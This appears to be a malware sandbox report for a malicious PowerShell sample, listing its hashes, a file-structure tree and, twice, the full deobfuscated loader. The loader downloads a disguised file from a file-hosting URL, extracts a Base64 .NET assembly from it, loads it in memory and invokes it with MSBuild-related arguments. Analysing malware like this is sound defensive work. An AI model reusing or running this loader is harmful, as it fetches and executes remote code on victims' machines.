Malicious
Malicious

2e6e2f37187fc0cf8ac73501b02a613b

PowerShell
|
MD5: 2e6e2f37187fc0cf8ac73501b02a613b
|
Size: 20.28 KB
|
application/x-powershell

PowerShell
Powershell: Hidden Execution
Contains Base64 Block
Base64 Block
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
2e6e2f37187fc0cf8ac73501b02a613b
Sha1
8931c4cba2ff3bd29281ee86ddb3f62772d63149
Sha256
ace00c4aa0c763c44c1821d87307262587d88aa3446bbff35c8816eb4a340623
Sha384
aa8dbd309ce349e28d635753681be50413bbe08495b85b8dad136cdc454df86fd5b589efdb0b83ae7358210d5c417f18
Sha512
0f7ebdeec48cdbdc0f4d0a26a7d8f4aaaad4833a233115cff5df2197e8b45619f9b653058a836fa4d1b9a094e672a6486d793e12322607928c407a14391ffe76
SSDeep
384:pjtP2z+UZX6qkPmgAAGUQLiYtq3jgPoI74s/xz5+xpe2ibYWIDajrUmFyjF8Kbgg:pjR2z+UZXzkRAAGUQLiYw3j+rUmFyjFF
TLSH
34920D4E5D03043289332F3E5F17544AEF6B052789298A40BFCCCAA5AFB565183B9F6D
File Structure
2e6e2f37187fc0cf8ac73501b02a613b
PowerShell
Powershell: Hidden Execution
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://files.catbox.moe/hejh36.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=kzNihjZxIDOxkzMy0yM5QGOtEDMzQTLlJ2M50SMzUDNzQzYm1jblt2b0ZSYpRWZt1DdsF2P0hHdukXe55Wa69ybvAHch5SZnFmcvR3clNXYiVmcpZmL2IzMkJWL0NWZq9mcw9iYvAjdv02bj5ycpBXYlx2Zv92ZuU2ZhJ3b0NXZzFmYlJXam9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "MSBuild", "", "", "", "", "C:\Users\Public\Downloads", "bifanged", "js", "", "", "lotong", "2", "") } ))
2e6e2f37187fc0cf8ac73501b02a613b (20.28 KB)
File Structure
2e6e2f37187fc0cf8ac73501b02a613b
PowerShell
Powershell: Hidden Execution
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://files.catbox.moe/hejh36.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=kzNihjZxIDOxkzMy0yM5QGOtEDMzQTLlJ2M50SMzUDNzQzYm1jblt2b0ZSYpRWZt1DdsF2P0hHdukXe55Wa69ybvAHch5SZnFmcvR3clNXYiVmcpZmL2IzMkJWL0NWZq9mcw9iYvAjdv02bj5ycpBXYlx2Zv92ZuU2ZhJ3b0NXZzFmYlJXam9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "MSBuild", "", "", "", "", "C:\Users\Public\Downloads", "bifanged", "js", "", "", "lotong", "2", "") } ))

Malicious

2e6e2f37187fc0cf8ac73501b02a613b > [Base64-Block]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙